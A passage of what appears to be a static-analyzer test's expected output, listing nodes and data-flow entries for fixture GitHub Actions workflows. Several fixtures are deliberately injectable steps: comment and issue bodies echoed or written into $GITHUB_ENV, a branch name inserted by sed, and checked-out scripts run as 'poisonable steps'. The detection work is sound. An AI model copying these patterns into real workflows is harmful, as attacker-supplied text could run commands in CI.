.github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | +| .github/workflows/shell.yml:1:1:22:32 | enter on: push | +| .github/workflows/shell.yml:1:1:22:32 | exit on: push | +| .github/workflows/shell.yml:1:1:22:32 | exit on: push (normal) | +| .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:5:5:9:2 | Job: job1 | +| .github/workflows/shell.yml:7:9:9:2 | Run Step | +| .github/workflows/shell.yml:8:14:8:31 | Write-Output "foo" | +| .github/workflows/shell.yml:10:5:14:2 | Job: job2 | +| .github/workflows/shell.yml:12:9:14:2 | Run Step | +| .github/workflows/shell.yml:12:14:12:23 | echo "foo" | +| .github/workflows/shell.yml:15:5:19:2 | Job: job3 | +| .github/workflows/shell.yml:17:9:19:2 | Run Step | +| .github/workflows/shell.yml:18:14:18:23 | echo "foo" | +| .github/workflows/shell.yml:20:5:22:32 | Job: job4 | +| .github/workflows/shell.yml:22:9:22:32 | Run Step | +| .github/workflows/shell.yml:22:14:22:31 | Write-Output "foo" | +| .github/workflows/test.yml:1:1:40:53 | enter on: push | +| .github/workflows/test.yml:1:1:40:53 | exit on: push | +| .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | +| .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +dfNodes +| .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:15:9:18:6 | Run Step | +| .github/workflows/commands.yml:16:14:17:30 | command1 ; command2\n | +| .github/workflows/commands.yml:18:9:20:6 | Run Step | +| .github/workflows/commands.yml:18:14:19:30 | command3 \| command4\n | +| .github/workflows/commands.yml:20:9:22:6 | Run Step | +| .github/workflows/commands.yml:20:14:21:33 | command5 "$(command6)"\n | +| .github/workflows/commands.yml:22:9:24:6 | Run Step | +| .github/workflows/commands.yml:22:14:23:31 | command7 && command8\n | +| .github/workflows/commands.yml:24:9:26:6 | Run Step | +| .github/workflows/commands.yml:24:14:25:32 | command9 \|\| command10\n | +| .github/workflows/commands.yml:26:9:28:6 | Run Step | +| .github/workflows/commands.yml:26:14:27:34 | command11 "`command12`"\n | +| .github/workflows/commands.yml:28:9:31:2 | Run Step | +| .github/workflows/commands.yml:28:14:29:50 | command13 "`command14` $(date \| wc -l)"\n | +| .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/commands.yml:34:9:37:6 | Run Step | +| .github/workflows/commands.yml:35:14:36:30 | command1 ; command2\n | +| .github/workflows/commands.yml:37:9:39:30 | Run Step | +| .github/workflows/commands.yml:38:14:39:30 | command3 \| command4\n | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | +| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | +| .github/workflows/shell.yml:5:5:9:2 | Job: job1 | +| .github/workflows/shell.yml:7:9:9:2 | Run Step | +| .github/workflows/shell.yml:8:14:8:31 | Write-Output "foo" | +| .github/workflows/shell.yml:10:5:14:2 | Job: job2 | +| .github/workflows/shell.yml:12:9:14:2 | Run Step | +| .github/workflows/shell.yml:12:14:12:23 | echo "foo" | +| .github/workflows/shell.yml:15:5:19:2 | Job: job3 | +| .github/workflows/shell.yml:17:9:19:2 | Run Step | +| .github/workflows/shell.yml:18:14:18:23 | echo "foo" | +| .github/workflows/shell.yml:20:5:22:32 | Job: job4 | +| .github/workflows/shell.yml:22:9:22:32 | Run Step | +| .github/workflows/shell.yml:22:14:22:31 | Write-Output "foo" | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +argumentNodes +| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +usesIds +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | step | +nodeLocations +| .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | .github/workflows/commands.yml:9:5:31:2 | .github/workflows/commands.yml@9:5:31:2 | +| .github/workflows/commands.yml:15:9:18:6 | Run Step | .github/workflows/commands.yml:15:9:18:6 | .github/workflows/commands.yml@15:9:18:6 | +| .github/workflows/commands.yml:16:14:17:30 | command1 ; command2\n | .github/workflows/commands.yml:16:14:17:30 | .github/workflows/commands.yml@16:14:17:30 | +| .github/workflows/commands.yml:18:9:20:6 | Run Step | .github/workflows/commands.yml:18:9:20:6 | .github/workflows/commands.yml@18:9:20:6 | +| .github/workflows/commands.yml:18:14:19:30 | command3 \| command4\n | .github/workflows/commands.yml:18:14:19:30 | .github/workflows/commands.yml@18:14:19:30 | +| .github/workflows/commands.yml:20:9:22:6 | Run Step | .github/workflows/commands.yml:20:9:22:6 | .github/workflows/commands.yml@20:9:22:6 | +| .github/workflows/commands.yml:20:14:21:33 | command5 "$(command6)"\n | .github/workflows/commands.yml:20:14:21:33 | .github/workflows/commands.yml@20:14:21:33 | +| .github/workflows/commands.yml:22:9:24:6 | Run Step | .github/workflows/commands.yml:22:9:24:6 | .github/workflows/commands.yml@22:9:24:6 | +| .github/workflows/commands.yml:22:14:23:31 | command7 && command8\n | .github/workflows/commands.yml:22:14:23:31 | .github/workflows/commands.yml@22:14:23:31 | +| .github/workflows/commands.yml:24:9:26:6 | Run Step | .github/workflows/commands.yml:24:9:26:6 | .github/workflows/commands.yml@24:9:26:6 | +| .github/workflows/commands.yml:24:14:25:32 | command9 \|\| command10\n | .github/workflows/commands.yml:24:14:25:32 | .github/workflows/commands.yml@24:14:25:32 | +| .github/workflows/commands.yml:26:9:28:6 | Run Step | .github/workflows/commands.yml:26:9:28:6 | .github/workflows/commands.yml@26:9:28:6 | +| .github/workflows/commands.yml:26:14:27:34 | command11 "`command12`"\n | .github/workflows/commands.yml:26:14:27:34 | .github/workflows/commands.yml@26:14:27:34 | +| .github/workflows/commands.yml:28:9:31:2 | Run Step | .github/workflows/commands.yml:28:9:31:2 | .github/workflows/commands.yml@28:9:31:2 | +| .github/workflows/commands.yml:28:14:29:50 | command13 "`command14` $(date \| wc -l)"\n | .github/workflows/commands.yml:28:14:29:50 | .github/workflows/commands.yml@28:14:29:50 | +| .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | .github/workflows/commands.yml:32:5:39:30 | .github/workflows/commands.yml@32:5:39:30 | +| .github/workflows/commands.yml:34:9:37:6 | Run Step | .github/workflows/commands.yml:34:9:37:6 | .github/workflows/commands.yml@34:9:37:6 | +| .github/workflows/commands.yml:35:14:36:30 | command1 ; command2\n | .github/workflows/commands.yml:35:14:36:30 | .github/workflows/commands.yml@35:14:36:30 | +| .github/workflows/commands.yml:37:9:39:30 | Run Step | .github/workflows/commands.yml:37:9:39:30 | .github/workflows/commands.yml@37:9:39:30 | +| .github/workflows/commands.yml:38:14:39:30 | command3 \| command4\n | .github/workflows/commands.yml:38:14:39:30 | .github/workflows/commands.yml@38:14:39:30 | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:5:5:21:47 | .github/workflows/expression_nodes.yml@5:5:21:47 | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:9:8:6 | .github/workflows/expression_nodes.yml@7:9:8:6 | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:7:14:7:58 | .github/workflows/expression_nodes.yml@7:14:7:58 | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:27:7:58 | .github/workflows/expression_nodes.yml@7:27:7:58 | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:9:10:6 | .github/workflows/expression_nodes.yml@8:9:10:6 | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:8:14:9:57 | .github/workflows/expression_nodes.yml@8:14:9:57 | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:9:25:9:56 | .github/workflows/expression_nodes.yml@9:25:9:56 | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:9:13:6 | .github/workflows/expression_nodes.yml@10:9:13:6 | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:10:14:12:53 | .github/workflows/expression_nodes.yml@10:14:12:53 | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:11:25:11:56 | .github/workflows/expression_nodes.yml@11:25:11:56 | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:12:24:12:51 | .github/workflows/expression_nodes.yml@12:24:12:51 | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:9:16:6 | .github/workflows/expression_nodes.yml@13:9:16:6 | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:13:14:15:46 | .github/workflows/expression_nodes.yml@13:14:15:46 | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:9:20:6 | .github/workflows/expression_nodes.yml@16:9:20:6 | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:16:14:19:57 | .github/workflows/expression_nodes.yml@16:14:19:57 | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:17:25:17:56 | .github/workflows/expression_nodes.yml@17:25:17:56 | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:18:24:18:51 | .github/workflows/expression_nodes.yml@18:24:18:51 | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:19:24:19:55 | .github/workflows/expression_nodes.yml@19:24:19:55 | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:9:21:47 | .github/workflows/expression_nodes.yml@20:9:21:47 | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | +| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | .github/workflows/multiline2.yml:9:5:89:35 | .github/workflows/multiline2.yml@9:5:89:35 | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | .github/workflows/multiline2.yml:11:9:15:6 | .github/workflows/multiline2.yml@11:9:15:6 | +| .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:30:14:33:14 | .github/workflows/multiline2.yml@30:14:33:14 | +| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline2.yml:32:13:32:39 | .github/workflows/multiline2.yml@32:13:32:39 | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:34:9:40:6 | .github/workflows/multiline2.yml@34:9:40:6 | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:35:14:39:14 | .github/workflows/multiline2.yml@35:14:39:14 | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:40:9:46:6 | .github/workflows/multiline2.yml@40:9:46:6 | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:41:14:45:14 | .github/workflows/multiline2.yml@41:14:45:14 | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:46:9:52:6 | .github/workflows/multiline2.yml@46:9:52:6 | +| .github/workflows/multiline2.yml:47:14:51:14 